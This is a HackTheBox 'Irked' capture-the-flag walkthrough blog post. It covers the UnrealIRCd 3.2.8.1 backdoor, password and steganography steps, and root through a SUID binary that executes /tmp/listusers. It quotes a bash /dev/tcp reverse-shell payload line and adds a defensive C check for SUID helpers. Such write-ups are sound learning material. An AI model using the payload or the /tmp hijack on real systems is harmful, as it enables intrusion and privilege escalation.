Irked — HackTheBox [Creator — MrAgent]

jaeng
3 min read, Feb 26, 2021

Before starting: all of the challenges posted here are part of my learning journey. I didn't solve them all; wherever I searched or learned from other senpais, I will reference them all.

Ideas:

  • Recon with rustscan and detect the IRCd service on ports 6697, 8067 and 65534
  • Exploit the vulnerable IRCd version 3.2.8.1 and gain a reverse shell
  • Find the .backup file in djmardov's Documents directory, which contains a password
  • Use the found password to extract pass.txt from irked.jpg and log in as djmardov
  • Root privilege escalation via the SUID binary "viewuser"

# Recon

Starting with: `rustscan --ulimit 5000 -a irked.htb -- -A -sC | tee rustscan_out`

Have a look at the website running on port 80. (In reality, I also tried to enumerate the rpcbind service on port 111 and ran hidden-directory discovery to enumerate as much as I could, but nothing there turned out to be really useful.)

"IRC is almost working!" refers to an IRC service running on another port (everyone knows that :) ). Therefore, I looked at some public IRC exploits. One of the good resources I used for a PoC:

Basically, the script sends the payload `AB; bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1' \n` to the IRC service to trigger a reverse connection. Knowing that, we can write a custom Python script to exploit the target (because the script I found didn't work in my specific case). If you want to have a look at my script, you can find it here.

# Shell as user djmardov

## Enumeration

There is a .backup file in djmardov's Documents folder.

Have a look at the file: it provides a password to extract the "irked.jpg" image (I immediately remembered the very big angry face on the website; I don't know how to explain it, because the thought came to me unreasonably).

Extracting the image gives us "pass.txt", which we can use to try logging in as user djmardov.

# Shell as root

There are some quick enumerations I run when logged in as a user, such as checking id, checking SUID binaries, checking the passwd file and checking crontab. Here, when checking SUID binaries, "viewuser" stood out as suspicious.

Try running it, and we immediately get an idea of how to obtain a root shell.

The binary tries to find "listusers" in the /tmp directory and execute it. As a result, we can place our own code in that file and the binary will execute it as root.

Run `/bin/bash -p` and we get a shell as the superuser.
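As an added, defender-side example that is not part of this writeup or the box: the check a privileged helper like viewuser should make before executing a program it looks up by name. The policy, the function names `safe_to_exec` and `make_fixture`, and the fixture files are my own assumptions: the target must be an absolute path to a regular root-trusted (or otherwise trusted) file that nobody else can write, in a directory that is not world-writable, which is exactly why a "listusers" dropped into /tmp is rejected.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <libgen.h>
#include <sys/stat.h>

/* Added example (assumed policy, not the box's viewuser code): return 1 only if
 * `path` is an absolute path to a regular file (symlinks rejected via lstat),
 * owned by `trusted`, executable, not writable by group/others, and located in
 * a directory owned by `trusted` that is not world-writable. /tmp is 1777, so
 * anything inside it fails the last check. */
int safe_to_exec(const char *path, uid_t trusted) {
    struct stat st, dst;
    char dirbuf[4096];

    if (path[0] != '/') return 0;                    /* no cwd/PATH lookups */
    if (lstat(path, &st) != 0) return 0;             /* lstat: a symlink is not a file */
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != trusted) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;  /* others could rewrite it */
    if (!(st.st_mode & S_IXUSR)) return 0;

    snprintf(dirbuf, sizeof dirbuf, "%s", path);     /* dirname() may modify its arg */
    if (stat(dirname(dirbuf), &dst) != 0) return 0;
    if (dst.st_uid != trusted) return 0;
    if (dst.st_mode & S_IWOTH) return 0;             /* world-writable dir: reject */
    return 1;
}

/* Demo fixture (constructed): write an executable script `name` into `dir`,
 * store its path in `out`. Returns 0 on success. */
int make_fixture(const char *dir, const char *name, char *out, size_t n) {
    snprintf(out, n, "%s/%s", dir, name);
    FILE *f = fopen(out, "w");
    if (!f) return -1;
    fputs("#!/bin/sh\necho listusers\n", f);
    fclose(f);
    return chmod(out, 0755);
}

int main(void) {
    char tmpl[] = "/tmp/viewuser_demo.XXXXXX", good[4096], bad[4096];
    char *dir = mkdtemp(tmpl);                       /* private dir: mode 0700, ours */
    if (!dir || make_fixture(dir, "listusers", good, sizeof good) != 0 ||
        make_fixture("/tmp", "listusers_demo", bad, sizeof bad) != 0)
        return 1;
    printf("%s -> %d (private dir, accepted)\n", good, safe_to_exec(good, getuid()));
    printf("%s -> %d (world-writable /tmp, rejected)\n", bad, safe_to_exec(bad, getuid()));
    return 0;
}
```

The same shape of check (owner, mode, and parent-directory mode) is what a reviewer should look for in any SUID helper that runs a program found under a path like /tmp.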

P/S: this is my very first post in the learning journey. This post isn't meant to teach anyone how to do stuff, so please don't get me wrong. Let's learn and improve together. Thanks. :)
